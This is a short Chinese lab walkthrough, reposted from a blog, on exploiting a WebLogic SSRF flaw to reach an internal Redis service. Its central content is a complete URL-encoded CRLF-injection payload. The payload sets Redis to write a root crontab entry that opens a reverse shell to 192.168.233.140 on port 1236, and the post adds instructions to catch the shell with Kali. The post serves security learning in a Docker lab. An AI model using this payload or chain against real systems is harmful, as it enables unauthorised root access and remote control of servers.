标签:20 ssrf SSRF 5Cn% 漏洞 Weblogic 20% 0D%
查看ssrf说明书
使用bp抓包
在命令行中输入docker inspect 容器id获取Weblogic的IP,容器id使用docker ps -a 查看
因为redis命令是通过换行符来分隔每条命令的
进行编码注意换行符“\r\n”也就是“%0D%0A”
将其经url编码后放在ssrf的域名后面,发送:
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.233.140%2F1236%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
这就是payload放在http://172.20.0.2:6379/后面就可以了
而后可以使用kali进行监听
标签:20,ssrf,SSRF,5Cn%,漏洞,Weblogic,20%,0D% 来源: https://www.cnblogs.com/ddhy/p/16158014.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。